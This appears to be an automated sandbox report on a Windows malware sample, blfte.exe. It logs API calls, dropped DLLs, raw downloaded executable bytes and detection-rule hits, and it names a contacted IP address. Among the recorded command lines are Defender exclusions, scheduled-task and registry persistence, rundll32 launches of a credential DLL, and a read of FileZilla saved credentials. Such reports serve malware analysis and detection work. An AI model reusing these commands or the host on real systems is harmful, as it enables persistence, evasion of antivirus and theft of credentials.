stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6d8b2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02682000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0270b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02707000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0268b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02705000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description blfte.exe tried to sleep 293 seconds, actually delayed analysis time by 293 seconds
file C:\ProgramData\1428cad52d922f\scr.dll
file C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe
file C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\test.bat
file C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\AdvancedRun.exe
file C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\test.bat
file C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe
file C:\ProgramData\1428cad52d922f\cred.dll
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN blfte.exe /TR "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" /F
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ao.exe" -Force
cmdline powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" -Force
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" -Force
cmdline "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\9be4a78dfb\
cmdline powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ao.exe" -Force
cmdline cmd.exe /c timeout 1
cmdline "C:\Windows\System32\cmd.exe" /c timeout 1
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN blfte.exe /TR "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" /F
file C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe
file C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe
file C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe
file C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe
parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
filepath: C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ao.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c timeout 1
filepath: cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\AdvancedRun.exe
parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
filepath: C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\AdvancedRun.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c timeout 1
filepath: cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\9be4a78dfb\
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN blfte.exe /TR "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\ProgramData\1428cad52d922f\cred.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\ProgramData\1428cad52d922f\scr.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x00000108
process_name: pw.exe
process_identifier: 3060
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: taskhost.exe
process_identifier: 2764
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: ao.exe
process_identifier: 2648
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: AdvancedRun.exe
process_identifier: 2244
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: TrustedInstaller.exe
process_identifier: 2744
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: blfte.exe
process_identifier: 1568
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ¡ –X€¤°@@ð@à& ˜CODE˜”– `DATA´°š@ÀBSSÝ Ð®À.idata&à®@À.edata@ð¾@P.reloc˜À@P.rsrc Þ@P@ò@P@ StringX@X@x;@„;@ˆ;@Œ;@€;@ø8@9@P9@TObjectd@TObjectX@System„@ IInterfaceÀFSystemÿÿ̃D$øéAJƒD$øé_JƒD$øéiJÌ̱@»@Å@ÀFÑ@@L@Ý@L@ @x;@ÐZ@ÜZ@Œ;@€;@ìZ@9@P9@TInterfacedObject‹Àÿ%¨áA‹Àÿ%¤áA‹Àÿ% áA‹Àÿ%œáA‹Àÿ%˜áA‹Àÿ%”áA‹Àÿ%áA‹Àÿ%ŒáA‹Àÿ%ˆáA‹Àÿ%„áA‹Àÿ%€áA‹Àÿ%|áA‹Àÿ%¼áA‹Àÿ%xáA‹Àÿ%¸áA‹Àÿ%táA‹Àÿ%páA‹Àÿ%láA‹Àÿ%háA‹Àÿ%dáA‹Àÿ%`áA‹Àÿ%\áA‹Àÿ%XáA‹Àÿ%TáA‹Àÿ%PáA‹Àÿ%LáA‹Àÿ%HáA‹Àÿ%´áA‹Àÿ%DáA‹Àÿ%@áA‹Àÿ%<áA‹Àÿ%ÌáA‹Àÿ%ÈáA‹Àÿ%ÄáA‹Àÿ%8áA‹Àÿ%4áA‹Àÿ%ÜáA‹Àÿ%ØáA‹Àÿ%ÔáA‹Àÿ%0áA‹Àÿ%,áA‹Àÿ%(áA‹Àÿ%$áA‹ÀSƒÄ¼» TèYÿÿÿöD$,t·\$0‹ÃƒÄD[ËÀÿ% áA‹Àÿ%áA‹Àÿ%áA‹Àÿ%áA‹Àÿ%áA‹Àÿ% áA‹Àÿ%áA‹Àÿ%áA‹ÀSƒÄô»àÕAƒ;uYhDjè¦ÿÿÿ‰D$ƒ|$u3À‰$ëP‹D$‹ÜÕA‰‹D$£ÜÕA3À‹ÐҋL$TщT$‹T$‹ ‰ ‹T$‰@ƒødu܋‰D$‹D$‹‰‹D$‰$‹$ƒÄ [ɉ@ËÀSVƒÄø‹ò‹Øèfÿÿÿ‰D$ƒ|$u3Àë:‹‹T$‰B‹F‹T$‰B ‹‰$‹D$‹$‰‹D$‰X‹$‹T$‰P‹D$‰°YZ^[ÃÄø‹P‰$‹‰T$‹$‹L$‰ ‹T$‹ $‰J‹àÕA‰£àÕAYZËÀSVWUƒÄø‹Ù‹ð‹ü‹‰‹‰‹B‰C‹‹‰D$‹‹R‹Ê‹/M ‹;Èu‹èÿÿÿ‹‹@‰‹‹@ CëC;Ðu‹èqÿÿÿ‹‹@ C‹D$‰;7u®‹Ó‹Æèúþÿÿ„Àu3À‰YZ]_^[Í@SVWUƒÄð‰$‹ô‹‰D$ ‹ ‹‹@;È‚†‹Ø‹>_ ‹ùz;ßrv;Èu!‹B‹A‹B‹)B ‹ƒx uV‹èðþÿÿëM‹Ø‹>_ ‹ùz;ßu ‹B‹)B ë3‹Z‰\$‹>‹‹.} +û‰|$+ȋ‰H T$‹èMþÿÿ„Àu3Àë°ë‹‹‰‹;D$ …Yÿÿÿ3ÀƒÄ]_^[ÐSVW‹Ú‹ðþ}¾ë Æÿÿæÿÿ‰sjh Vjè4ýÿÿ‹ø‰;…ÿt#‹Ó¸äÕAèÜýÿÿ„Àuh€j‹Pèýÿÿ3À‰_^[ÐSVWU‹Ù‹ò‹èÇCjh hUèáüÿÿ‹ø‰;…ÿuÆÿÿæÿÿ‰sjh VUè¼üÿÿ‰ƒ;t#‹Ó¸äÕAèeýÿÿ„Àuh€j‹Pèžüÿÿ3À‰]_^[ÐSVWUƒÄè‹ù‹ôÇD$ÿÿÿÿ3ɉL$ ‰D$T$‰T$¡äÕA‰ëk‹‹‰D$‹‹X;\$rR‹Ã‹B ;D$wE;\$s‰\$‹‹h‹h ;l$ v‰l$ h€j‹‹@Pèüÿÿ…Àu ÇÀÕA‹èýÿÿ‹D$‰¸äÕA;uŒ3À‰ƒ|$ t‹D$‰‹D$ +D$‰GƒÄ]_^[ËÀSVWUƒÄè‹Ù‰$t$|$l$ ‹Ð‹Êáðÿÿ‰L$$Âÿâðÿÿ‰T$‹D$‰‹D$+D$‰C¡äÕA‰ë[‹‹@‰‹‹@ ‰E‹;D$s‹D$‰‹E;D$v‹D$‰E‹;Esjh‹E+P‹Pè&ûÿÿ…Àu3À‰ë‹‹‰¸äÕA;uœƒÄ]_^[ÐSVWUƒÄè‰$t$|$\$ ‹Ð‹êÅÿåðÿÿ‰l$$âðÿÿ‰T$‹D$‰‹D$+D$‰A¡äÕA‰ëX‹‹@‰‹‹@ ‰‹;D$s‹D$‰‹;D$v‹D$‰‹;s h@‹+P‹Pèwúÿÿ…Àu ÇÀÕA‹‹‰¸äÕA;uŸƒÄ]_^[ËÀSVWUƒÄô‹Ú‹ð‹ü½ôÕAÆÿ?æÀÿÿ‹E‰ëA‹;p 4‹Ë‹‹@‹ÖèJþÿÿƒ;t_‹C‹B‹C‹)B ‹ƒx uG‹èûÿÿë>‹‹‰;/u»‹Ó‹Æèmüÿÿƒ;t&L$‹Ó‹Åèûÿÿƒ|$u’L$‹S‹è"ýÿÿ3À‰ƒÄ ]_^[ËÀSVWUƒÄè‰ $‹ú‹Øt$½ôÕAÇÿ?çÀÿÿ‹E‰ë‹‹‰;.t‹;Xuï‹;Xu_‹;x Žœ‹‹×+P ‹‹@‹A L$è5üÿÿƒ|$t3L$T$‹Åèoúÿÿƒ|$uŸL$‹T$ ‹D$èüÿÿ‹$3҉隍L$‹×‹Ãèîûÿÿƒ|$t4L$T$‹Åè(úÿÿƒ|$…TÿÿÿL$‹T$ ‹D$è4üÿÿ‹$3҉ëR‹‹h;ÝuB‹;x ;‹ $‹Å‹×è×üÿÿ‹$ƒ8t.‹$‹@‹B‹$‹@‹)B ‹ƒx u‹è†ùÿÿë‹$3҉ƒÄ]_^[ÐSƒÄè‹Ùˆÿ?áÀÿÿ‰ $ЁâÀÿÿ‰T$‹D$;$v_‹Ë‹T$+$‹$èýÿÿL$‹Ó¸ôÕAè]ùÿÿ‹\$…ÛtL$‹T$ ‹Ãènûÿÿ‹D$‰D$‹D$‰D$ ƒ|$tT$¸ôÕAè©ùÿÿë3À‰ƒÄ[ËÀU‹ìQ3ÒUhì@dÿ2d‰"hÄÕAè¼÷ÿÿ€=EÐAt hÄÕAè±÷ÿÿ¸äÕAèCøÿÿ¸ôÕAè9øÿÿ¸ ÖAè/øÿÿhøjè_÷ÿÿ£ÖAƒ=ÖAt@¸‹ÖA3ɉL‚ô@=uìÇEüÖA‹Eü‹Uü‰P‹Eü‹Uü‰‹Eü£ÖAƼÕA3ÀZYYd‰hó@€=EÐAt hÄÕAè!÷ÿÿÃéW"ëå ¼ÕAY]ÐU‹ìƒ
request_handle: 0x00cc0018
1 1 0

InternetReadFile

 buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ¡  j, @Ðp?Pа€ &CODED   `DATA` @ÀBSS¥ @"À.idataÐP"@À.edata?p6@P.reloc &€(8@P.rsrc°`@PÐx@P@Integer€ÿÿÿ‹À@ Stringp@p@”:@ :@¤:@¨:@œ:@à7@ü7@88@TObject|@TObjectp@Systemœ@ IInterfaceÀFSystemÿÿ̃D$øé©KƒD$øéÇKƒD$øéÑKÌÌÉ@Ó@Ý@ÀFé@@d@õ@d@ $@”:@P\@\\@¨:@œ:@l\@ü7@88@TInterfacedObject‹Àÿ%¨QC‹Àÿ%¤QC‹Àÿ% QC‹Àÿ%œQC‹Àÿ%˜QC‹Àÿ%”QC‹Àÿ%QC‹Àÿ%ŒQC‹Àÿ%ˆQC‹Àÿ%„QC‹Àÿ%€QC‹Àÿ%|QC‹Àÿ%¼QC‹Àÿ%xQC‹Àÿ%¸QC‹Àÿ%tQC‹Àÿ%pQC‹Àÿ%lQC‹Àÿ%hQC‹Àÿ%dQC‹Àÿ%`QC‹Àÿ%\QC‹Àÿ%XQC‹Àÿ%TQC‹Àÿ%PQC‹Àÿ%LQC‹Àÿ%HQC‹Àÿ%´QC‹Àÿ%DQC‹Àÿ%@QC‹Àÿ%<QC‹Àÿ%ÌQC‹Àÿ%ÈQC‹Àÿ%ÄQC‹Àÿ%8QC‹Àÿ%4QC‹Àÿ%ÜQC‹Àÿ%ØQC‹Àÿ%ÔQC‹Àÿ%0QC‹Àÿ%,QC‹Àÿ%(QC‹Àÿ%$QC‹ÀSƒÄ¼» TèYÿÿÿöD$,t·\$0‹ÃƒÄD[ËÀÿ% QC‹Àÿ%QC‹Àÿ%QC‹Àÿ%QC‹Àÿ%QC‹Àÿ% QC‹Àÿ%QC‹Àÿ%QC‹ÀSƒÄô»àECƒ;uYhDjè¦ÿÿÿ‰D$ƒ|$u3À‰$ëP‹D$‹ÜEC‰‹D$£ÜEC3À‹ÐҋL$TщT$‹T$‹ ‰ ‹T$‰@ƒødu܋‰D$‹D$‹‰‹D$‰$‹$ƒÄ [ɉ@ËÀSVƒÄø‹ò‹Øèfÿÿÿ‰D$ƒ|$u3Àë:‹‹T$‰B‹F‹T$‰B ‹‰$‹D$‹$‰‹D$‰X‹$‹T$‰P‹D$‰°YZ^[ÃÄø‹P‰$‹‰T$‹$‹L$‰ ‹T$‹ $‰J‹àEC‰£àECYZËÀSVWUƒÄø‹Ù‹ð‹ü‹‰‹‰‹B‰C‹‹‰D$‹‹R‹Ê‹/M ‹;Èu‹èÿÿÿ‹‹@‰‹‹@ CëC;Ðu‹èqÿÿÿ‹‹@ C‹D$‰;7u®‹Ó‹Æèúþÿÿ„Àu3À‰YZ]_^[Í@SVWUƒÄð‰$‹ô‹‰D$ ‹ ‹‹@;È‚†‹Ø‹>_ ‹ùz;ßrv;Èu!‹B‹A‹B‹)B ‹ƒx uV‹èðþÿÿëM‹Ø‹>_ ‹ùz;ßu ‹B‹)B ë3‹Z‰\$‹>‹‹.} +û‰|$+ȋ‰H T$‹èMþÿÿ„Àu3Àë°ë‹‹‰‹;D$ …Yÿÿÿ3ÀƒÄ]_^[ÐSVW‹Ú‹ðþ}¾ë Æÿÿæÿÿ‰sjh Vjè4ýÿÿ‹ø‰;…ÿt#‹Ó¸äECèÜýÿÿ„Àuh€j‹Pèýÿÿ3À‰_^[ÐSVWU‹Ù‹ò‹èÇCjh hUèáüÿÿ‹ø‰;…ÿuÆÿÿæÿÿ‰sjh VUè¼üÿÿ‰ƒ;t#‹Ó¸äECèeýÿÿ„Àuh€j‹Pèžüÿÿ3À‰]_^[ÐSVWUƒÄè‹ù‹ôÇD$ÿÿÿÿ3ɉL$ ‰D$T$‰T$¡äEC‰ëk‹‹‰D$‹‹X;\$rR‹Ã‹B ;D$wE;\$s‰\$‹‹h‹h ;l$ v‰l$ h€j‹‹@Pèüÿÿ…Àu ÇÀEC‹èýÿÿ‹D$‰¸äEC;uŒ3À‰ƒ|$ t‹D$‰‹D$ +D$‰GƒÄ]_^[ËÀSVWUƒÄè‹Ù‰$t$|$l$ ‹Ð‹Êáðÿÿ‰L$$Âÿâðÿÿ‰T$‹D$‰‹D$+D$‰C¡äEC‰ë[‹‹@‰‹‹@ ‰E‹;D$s‹D$‰‹E;D$v‹D$‰E‹;Esjh‹E+P‹Pè&ûÿÿ…Àu3À‰ë‹‹‰¸äEC;uœƒÄ]_^[ÐSVWUƒÄè‰$t$|$\$ ‹Ð‹êÅÿåðÿÿ‰l$$âðÿÿ‰T$‹D$‰‹D$+D$‰A¡äEC‰ëX‹‹@‰‹‹@ ‰‹;D$s‹D$‰‹;D$v‹D$‰‹;s h@‹+P‹Pèwúÿÿ…Àu ÇÀEC‹‹‰¸äEC;uŸƒÄ]_^[ËÀSVWUƒÄô‹Ú‹ð‹ü½ôECÆÿ?æÀÿÿ‹E‰ëA‹;p 4‹Ë‹‹@‹ÖèJþÿÿƒ;t_‹C‹B‹C‹)B ‹ƒx uG‹èûÿÿë>‹‹‰;/u»‹Ó‹Æèmüÿÿƒ;t&L$‹Ó‹Åèûÿÿƒ|$u’L$‹S‹è"ýÿÿ3À‰ƒÄ ]_^[ËÀSVWUƒÄè‰ $‹ú‹Øt$½ôECÇÿ?çÀÿÿ‹E‰ë‹‹‰;.t‹;Xuï‹;Xu_‹;x Žœ‹‹×+P ‹‹@‹A L$è5üÿÿƒ|$t3L$T$‹Åèoúÿÿƒ|$uŸL$‹T$ ‹D$èüÿÿ‹$3҉隍L$‹×‹Ãèîûÿÿƒ|$t4L$T$‹Åè(úÿÿƒ|$…TÿÿÿL$‹T$ ‹D$è4üÿÿ‹$3҉ëR‹‹h;ÝuB‹;x ;‹ $‹Å‹×è×üÿÿ‹$ƒ8t.‹$‹@‹B‹$‹@‹)B ‹ƒx u‹è†ùÿÿë‹$3҉ƒÄ]_^[ÐSƒÄè‹Ùˆÿ?áÀÿÿ‰ $ЁâÀÿÿ‰T$‹D$;$v_‹Ë‹T$+$‹$èýÿÿL$‹Ó¸ôECè]ùÿÿ‹\$…ÛtL$‹T$ ‹Ãènûÿÿ‹D$‰D$‹D$‰D$ ƒ|$tT$¸ôECè©ùÿÿë3À‰ƒÄ[ËÀU‹ìQ3ÒUh@dÿ2d‰"hÄECè¼÷ÿÿ€=E@Ct hÄECè±÷ÿÿ¸äECèCøÿÿ¸ôECè9øÿÿ¸ FCè/øÿÿhøjè_÷ÿÿ£FCƒ=FCt@¸‹FC3ɉL‚ô@=uìÇEüFC‹Eü‹Uü‰P‹Eü‹Uü‰‹Eü£FCƼEC3ÀZYYd‰h @€=E@Ct hÄECè!
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Communications over HTTP rule Network_HTTP
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communications over HTTP rule Network_HTTP
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN blfte.exe /TR "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" /F
cmdline "C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline "C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\9be4a78dfb\
cmdline C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\9be4a78dfb\
cmdline C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN blfte.exe /TR "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" /F
cmdline cmd /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\9be4a78dfb\
host 185.215.113.38
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 225280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000428
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 225280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000414
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN blfte.exe /TR "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN blfte.exe /TR "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" /F
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
